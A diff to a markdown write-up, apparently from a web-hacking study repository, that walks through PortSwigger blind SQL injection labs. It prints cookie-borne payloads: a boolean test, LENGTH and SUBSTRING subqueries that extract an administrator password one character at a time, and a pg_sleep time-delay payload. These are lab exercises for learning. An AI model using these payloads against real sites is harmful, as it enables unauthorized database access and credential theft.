Trumpiter-max/Web-Hacking-101/Server-Side/sql.md

 The database contains a different table called **users**, with columns called **username and password**, find out the password of the administrator user.

-So we need modify cookie, when we use burpsuite, and open page, we will get cookie like this: `Cookie: TrackingId=78FpD4ERhK86IMIp; session=cjruWYG4ZqnnopctvKK3e3DJS2nN8eM2`.
+So we need to modify cookie, when we use burp suite, and open page, we will get cookie like this: `Cookie: TrackingId=78FpD4ERhK86IMIp; session=cjruWYG4ZqnnopctvKK3e3DJS2nN8eM2`.

 If we modify session, the website will be loss data of this session, so we will modify TrackingID `Cookie: TrackingId=78FpD4ERhK86IMIp+'+or+1=1--; session=cjruWYG4ZqnnopctvKK3e3DJS2nN8eM2`, and return page including 'Welcome back', so it is right direction.
 Only thing we can do is making condition.
 At the first, determine the length of password `Cookie: TrackingId=78FpD4ERhK86IMIp+'or+(SELECT+LENGTH(password)+FROM+users+WHERE+username='administrator')=20--; session=cjruWYG4ZqnnopctvKK3e3DJS2nN8eM2`

-Note: using burp intruder for bruting force value in condition
+Note: using burp intruder for brute force value in condition

-Nextly, using brute force to guess 20-length password
+Next, using brute force to guess 20-length password character by character with turbo intruder

+Guess first character
+`Cookie: TrackingId=78FpD4ERhK86IMIp+'or+(SELECT+SUBSTRING(password,1,1)+FROM+users+WHERE+username='administrator')='%s'--; session=cjruWYG4ZqnnopctvKK3e3DJS2nN8eM2`

+Using this [script](/Scripts/brutecondition.py) to guess, then write answer for per attack.
+After 20 trial, we will get password is `s4ykqo9mvgpqisgnzv9t`.
+Log in with this password and solved the lab.

 [Lab 12](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors)

 [Lab 13](https://portswigger.net/web-security/sql-injection/blind/lab-time-delays)

-Description of this lab: exploit the SQL injection vulnerability to cause a 10 second delay.
+Description of this lab: exploit the SQL injection vulnerability to cause a 10 seconds delay.

 Using payload similar `Cookie: TrackingId=nTjOlcnGoesLH7fd+'or+pg_sleep(10)--; session=8BYemkFDFxWMOkX21X7uPWmJ0P1fAYRl` to sleep in 10 second, then solved the lab.